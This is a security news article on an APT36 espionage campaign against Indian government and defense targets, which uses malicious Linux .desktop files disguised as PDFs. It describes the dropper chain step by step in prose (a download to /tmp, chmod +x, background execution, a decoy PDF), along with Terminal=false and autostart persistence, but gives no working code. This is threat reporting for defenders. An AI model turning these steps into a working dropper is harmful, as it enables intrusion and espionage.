The Pakistani cyber-espionage group known as APT36 is back in action, and this time it's targeting Linux systems using .desktop files as a vehicle to deploy malware. According to new reports from CYFIRMA and CloudSEK, these attacks are primarily aimed at government and defense sector organizations in India.
The goal is clear: to steal sensitive information and maintain persistent access for espionage activities. This is not the first time APT36 has used this technique; they had previously employed .desktop files in past campaigns across South Asia for similar purposes.
The malicious activity was first detected on August 1, 2025, and evidence suggests the attacks are still ongoing.
How Are APT36 Hackers Abusing .desktop Files on Linux?
Although CYFIRMA and CloudSEK describe different variants of the attack (with varying infrastructures and malware samples), both agree on the essentials: APT36's techniques, tactics, and objectives are nearly identical.
It all starts with a classic social engineering tactic: a phishing email sent to the victim with a ZIP file attachment. Inside the compressed file is a supposed PDF document—but in reality, it's a malicious .desktop file cleverly disguised with a misleading name and icon.
On Linux, .desktop files are application launchers—small text files that tell the desktop environment how to run an application and how the shortcut should appear. APT36 has cleverly exploited this functionality to inject their malicious code.
What Happens When the Victim Opens the File?
Believing it's a harmless PDF, the victim double-clicks the file. But what actually happens is that a hidden Bash command embedded in the file’s Exec= field is executed.
That command:
-
Creates a temporary file in the
/tmp/directory. -
Downloads a hex-encoded payload, either from a server controlled by the attackers or directly from Google Drive.
-
Writes the payload to the temporary file.
-
Grants it execution permissions using
chmod +x. -
And finally, executes it in the background, compromising the system.
APT36 doesn’t stop there. To avoid raising suspicion, the script also launches Firefox and opens a decoy PDF hosted on Google Drive. This way, the user believes they’ve simply opened the expected document—unaware that their system is now infected.
Sample of a Decoy PDF Used in the Attacks (Source: CloudSEK)
Read more: Detect Malicious PDFs and Keep Them from Endangering Your Security
Techniques to Hide Execution and Ensure Persistence on Linux
In addition to using the Exec= field to run commands in the background, the attackers got creative and added a few more tricks to the .desktop file. For instance, they included the line Terminal=false to prevent any visible terminal window from opening—helping to keep the victim from suspecting that something unusual is happening.
They also added X-GNOME-Autostart-enabled=true, which causes the file to run automatically every time the user logs in. In other words, the malware ensures it remains active even after a system reboot, maintaining access without raising any alarms.
Malicious Desktop File (Source: CloudSEK)
.desktop Files: From Innocent Shortcuts to Espionage Tools
In Linux environments, .desktop files are simple text-based shortcuts. Their primary function is to define things like an application's name, icon, and the command that runs when the user clicks on it. They are a common part of the desktop environment and generally don’t raise any red flags.
But APT36 has found a way to turn this basic functionality into a powerful attack vector. Instead of using .desktop files as legitimate shortcuts, the attackers transform them into droppers (malware loaders) and persistence mechanisms—very similar to how .LNK shortcuts are exploited in Windows.
And here’s the most concerning part: since these files are plain text and not binary executables, and because their abuse isn’t widely documented, many Linux security solutions don’t flag them as threats. It’s the perfect disguise.
What Does the Malware Downloaded by These Files Do?
The malicious .desktop file ultimately drops an ELF executable (the typical format in Linux) written in Go, specifically designed for espionage activities. Although the code is obfuscated and packed to hinder analysis, researchers uncovered several interesting capabilities:
-
It can be configured to operate in stealth mode.
-
It attempts to maintain persistence on its own, using methods such as cron jobs or systemd services—both common for managing scheduled tasks and system services in Linux.
-
It communicates with its command-and-control (C2) server via a bidirectional WebSocket channel, which not only allows for the exfiltration of sensitive data but also enables real-time command execution from the attacker.
Overview of the Attack (Source: CloudSEK)
Read more: How to Defend Against Malware Persistence Techniques with Wazuh
A Clear Sign of Evolution in APT36
According to experts from CYFIRMA and CloudSEK, this campaign marks a significant leap in APT36’s sophistication. The group is now employing more evasive tactics, more refined techniques, and increasingly creative ways to exploit legitimate system features for malicious purposes.
In short, it’s no longer just about tricking the user with a bait file—it’s about establishing a silent, persistent, and hard-to-detect presence on the system. This poses a real threat even to Linux users, who have traditionally considered the platform more secure.